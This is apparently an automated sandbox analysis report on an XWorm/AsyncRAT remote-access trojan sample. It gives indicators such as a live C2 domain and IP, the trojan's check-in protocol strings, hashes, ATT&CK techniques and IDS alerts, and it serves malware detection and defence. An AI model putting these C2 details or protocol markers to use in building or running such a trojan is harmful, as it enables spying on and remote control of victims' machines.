            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3288796136.0000000002D74000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3288796136.0000000002D74000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3288796136.0000000002D74000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3288796136.0000000002D74000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager2
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Queries volume information: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe VolumeInformation
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3290293188.000000001B887000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, type: SAMPLE
            Source: Yara match | File source: 0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000000.840308538.00000000005D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.3288796136.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe PID: 6920, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, type: SAMPLE
            Source: Yara match | File source: 0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000000.840308538.00000000005D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.3288796136.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe PID: 6920, type: MEMORYSTR

            MITRE ATT&CK Matrix (listed per tactic column; a number in parentheses is the count shown next to that technique in the matrix)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
            Execution: Windows Management Instrumentation (11); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
            Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Defense Evasion: Disable or Modify Tools (1); Virtualization/Sandbox Evasion (131); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); Software Packing (2); DLL Side-Loading (1)
            Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
            Discovery: Security Software Discovery (121); Process Discovery (2); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); System Information Discovery (13); Wi-Fi Discovery; Remote System Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
            Collection: Input Capture (1); Archive Collected Data (11); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
            Command and Control: Encrypted Channel (1); Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (21); Fallback Channels; Multiband Communication; Commonly Used Port
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
            Behavior Graph ID: 1652322
            Sample: 1743362826ccceca1466d461430...
            Start date: 30/03/2025
            Architecture: WINDOWS
            Score: 100
            Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
            Process started: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe
            DNS/IP: jeggawire.ddns.net (Uses dynamic DNS services) -> 176.65.134.56, ports 1111 and 49682, DIOGELO-ASGB, Germany
            Process-level signature: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

            Antivirus detection (Source | Detection | Scanner | Label)
            1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | 75% | Virustotal |
            1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | 86% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
            1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | 100% | Avira | TR/Spy.Gen
            SAMPLE | 100% | Joe Sandbox ML |
            No Antivirus matches
            URL detection (Source | Detection | Scanner | Label)
            jeggawire.ddns.net | 0% | Avira URL Cloud | safe


Name | IP | Active | Malicious | Antivirus Detection | Reputation
jeggawire.ddns.net | 176.65.134.56 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
jeggawire.ddns.net | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3288796136.00000000029C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
176.65.134.56 | jeggawire.ddns.net | Germany | | 56325 | DIOGELO-ASGB | true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1652322
Start date and time: 2025-03-30 21:27:22 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 4
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212, 23.204.23.20, 2.23.227.215, 20.190.190.132, 23.57.90.146
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
Time | Type | Description
15:28:16 | API Interceptor | 12623857x Sleep call for process: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
176.65.134.56 | 1743362767b39ce9ae90af463b2090fcece5c4349a42c3942cf272d75d62dd81aabd676faf123.dat-decoded.exe | Get hash | malicious | XWorm | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
jeggawire.ddns.net | 1743362767b39ce9ae90af463b2090fcece5c4349a42c3942cf272d75d62dd81aabd676faf123.dat-decoded.exe | Get hash | malicious | XWorm | Browse | 176.65.134.56
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
DIOGELO-ASGB | 1743362767b39ce9ae90af463b2090fcece5c4349a42c3942cf272d75d62dd81aabd676faf123.dat-decoded.exe | Get hash | malicious | XWorm | Browse | 176.65.134.56
 | SZf8I0IvEg.exe | Get hash | malicious | AsyncRAT, DcRat | Browse | 176.65.134.105
 | Z9dgTYzz4x.exe | Get hash | malicious | RHADAMANTHYS | Browse | 176.65.134.153
 | killua.x86.elf | Get hash | malicious | Unknown | Browse | 176.65.134.43
 | a55fee51fe469b7ed4f23ef3753b380fb548d65f40306962.pptm.ps1 | Get hash | malicious | RHADAMANTHYS | Browse | 176.65.134.153
 | sparc.nn.elf | Get hash | malicious | Mirai | Browse | 176.65.134.15
 | jae1h6e218.exe | Get hash | malicious | RHADAMANTHYS | Browse | 176.65.134.145
 | 5IY8PW2nOl.exe | Get hash | malicious | RHADAMANTHYS | Browse | 176.65.134.145
 | tdm.js | Get hash | malicious | Remcos | Browse | 176.65.134.41
 | morte.x64.elf | Get hash | malicious | Unknown | Browse | 176.65.134.62
                  No context
                  No context
                  No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 5.6031175864082945
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe
File size: 36'864 bytes
MD5: 919d580a19380debbf5159ec58c35562
SHA1: 6ec5d5f491148e4891666dedbce2f7f5976e59d6
SHA256: 877cbf41e73553688fed3a860de3bdaf5697a591ae9525469b00242137eaaa15
SHA512: 40ab34dbf5816807aea748b8d621154cb318cb8314b5ce351561c85bebc5cdad6f5e40024aab7eec6fd0723bdb330dd60be1b1b24aacef3155c56c9666de0890
SSDEEP: 768:CqQq3QWIdhgbvnUASaKyobFf9kcrOMhe3XPc:CPq3QnbOvUgKyAFf9kcrOMsPc
TLSH: 3EF24D087B944226D9FD7FF169B371020674E613D913EB9D48E859EE2F277C08E013AA
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q.g............................n.... ........@.. ....................................@................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x40a56e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x67E171D6 [Mon Mar 24 14:53:10 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction (entrypoint disassembly)
jmp dword ptr [00402000h]
add byte ptr [eax], al (repeated 97 times: this is the disassembly of the zero-filled bytes that follow the native CLR stub jump)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa514 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x4f0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x8574 | 0x8600 | 8e6c775f7b6eeb8ea9afedc883ec5d48 | False | 0.5004081156716418 | data | 5.737529221071247 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x4f0 | 0x600 | c82c95498a964b689627edc80ea5e18f | False | 0.3782552083333333 | data | 3.754317409647242 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe000 | 0xc | 0x200 | baacbdcb4fc7d641e62fe9f1a5927e77 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc0a0 | 0x25c | data | | | 0.4652317880794702
RT_MANIFEST | 0xc300 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
FileDescription |
FileVersion | 1.0.0.0
InternalName | jegganewfile.exe
LegalCopyright |
OriginalFilename | jegganewfile.exe
ProductVersion | 1.0.0.0
Assembly Version | 1.0.0.0


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-30T21:28:30.618078+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:28:30.618078+0200 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:28:36.788927+0200 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:28:37.026992+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:28:37.037271+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:28:50.076928+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:28:50.079672+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:28:57.616715+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:28:57.616715+0200 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:03.141015+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:03.143741+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:16.201894+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:16.206043+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:25.297158+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:25.305031+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:27.616448+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:27.616448+0200 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:30.973164+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:31.199153+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:31.199420+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:31.426712+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:41.667276+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:41.671826+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:44.238782+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:44.240550+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:46.559500+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:46.791098+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:46.791192+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:47.083092+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:50.584427+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:50.586100+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:52.485613+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:52.716309+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:52.716415+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:52.993486+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:56.172156+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:56.179138+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:56.641580+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:57.915595+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:02.673286+0200 | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:02.900388+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:03.446405+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:03.446534+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:03.668617+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:07.468590+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:07.471577+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:14.659168+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:14.661452+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:15.717930+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:15.720319+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:19.097059+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:19.336909+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:19.337148+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:19.559107+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:23.220897+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:23.222640+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:27.607442+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:27.607442+0200 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:27.947299+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:28.024230+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:29.747415+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:29.749554+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:39.983246+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:39.986702+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:42.541377+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
